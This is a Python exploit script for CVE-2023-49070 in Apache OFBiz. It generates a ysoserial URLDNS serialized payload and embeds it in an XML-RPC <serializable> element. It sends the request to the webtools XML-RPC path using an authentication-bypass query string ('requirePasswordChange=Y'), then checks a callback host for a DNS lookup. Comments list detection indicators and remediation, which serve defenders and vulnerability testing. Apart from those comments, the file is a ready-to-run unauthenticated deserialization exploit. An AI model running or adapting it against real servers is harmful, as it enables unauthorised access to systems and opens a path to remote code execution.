CVE-2023-49070.py
import requests
import subprocess
import base64
import sys
from colorama import Fore, Style
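# Proof-of-concept check for CVE-2023-49070 (Apache OFBiz XML-RPC endpoint).
#
# What it does: builds a ysoserial "URLDNS" object (a Java serialized object
# whose only effect on deserialization is a DNS lookup of the given host),
# base64-encodes it, wraps it in an XML-RPC <serializable> element and POSTs
# it to the webtools XML-RPC control path. A lookup arriving at the callback
# host indicates the server deserialized the request body.
#
# What a defender can take from it (all visible in the request built below):
#   * POST requests whose path contains "webtools/control/xmlrpc" followed
#     by ";/", with "requirePasswordChange=Y" in the query string;
#   * an XML body carrying a <serializable> element from the
#     ws.apache.org/xmlrpc extensions namespace;
#   * unexpected outbound DNS lookups from the application server.
# Remediation is the upgrade named in the Apache OFBiz advisory for this CVE;
# until then, restricting access to the XML-RPC control path reduces exposure.
#
# Usage: CVE-2023-49070.py <base-url> <callback-host>
#   <base-url> is concatenated directly with the endpoint path, so it is
#   expected to end with "/".
Gcyan = Fore.YELLOW + Style.BRIGHT
Cyan = Fore.CYAN + Style.BRIGHT
STOP = Style.RESET_ALL
# Raw string: the banner is full of backslashes that are not valid escape
# sequences, which newer Python versions warn about in a normal literal.
# None of them form a valid escape, so the printed text is unchanged.
logo = r'''
______ _______ ____ ___ ____ _____ _ _ ___ ___ _____ ___
/ ___\ \ / | ____| |___ \ / _ |___ \|___ / | || | / _ \ / _ |___ / _ \ /
| | \ \ / /| _| _____ __) | | | |__) | |_ \ _____| || || (_) | | | | / | | | |
| |___ \ V / | |__|_____/ __/| |_| / __/ ___) |_____|__ _\__, | |_| |/ /| |_| |
\____| \_/ |_____| |_____|\___|_____|____/ |_| /_/ \___//_/ \___/
'''
print(Gcyan + logo + STOP)
print(Cyan + "PoC Script" + STOP + Gcyan + " By: 0xRobiul\n" + STOP)

# Both positional arguments are required; without this check a missing
# argument surfaces as a bare IndexError traceback.
if len(sys.argv) < 3:
    print("Usage: " + sys.argv[0] + " <base-url> <callback-host>")
    sys.exit(1)

url=str(sys.argv[1])
colab="http://"+str(sys.argv[2])
headers = {
'Content-Type': 'application/xml'
}
# Requires a local Java runtime and ysoserial-all.jar in the working
# directory; check_output raises CalledProcessError if the jar exits non-zero.
# Arguments are passed as a list, so no shell is involved.
payload_gen=subprocess.check_output(["java","-jar","ysoserial-all.jar","URLDNS",colab])
base64_enc=base64.b64encode(payload_gen).decode()
# The method name and the member name ("rce") are only labels in this
# request; the content that matters is the <serializable> element.
payload = '''<?xml version="1.0"?>
<methodCall>
<methodName>Dns</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>rce</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
%s
</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
'''%base64_enc
# The dummy credentials plus requirePasswordChange=Y in the query string are
# the unauthenticated part of the request. verify=False turns off TLS
# certificate validation for this call. The timeout keeps the script from
# hanging forever on an unresponsive host.
req=requests.post(url+"webtools/control/xmlrpc;/?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y",data=payload,headers=headers,verify=False,timeout=15)
# The HTTP response is not inspected: this message only means the request
# was sent. The outcome is observed out of band, at the callback host.
print(Cyan + "Done!! Check Burp Colabrator!!" + STOP)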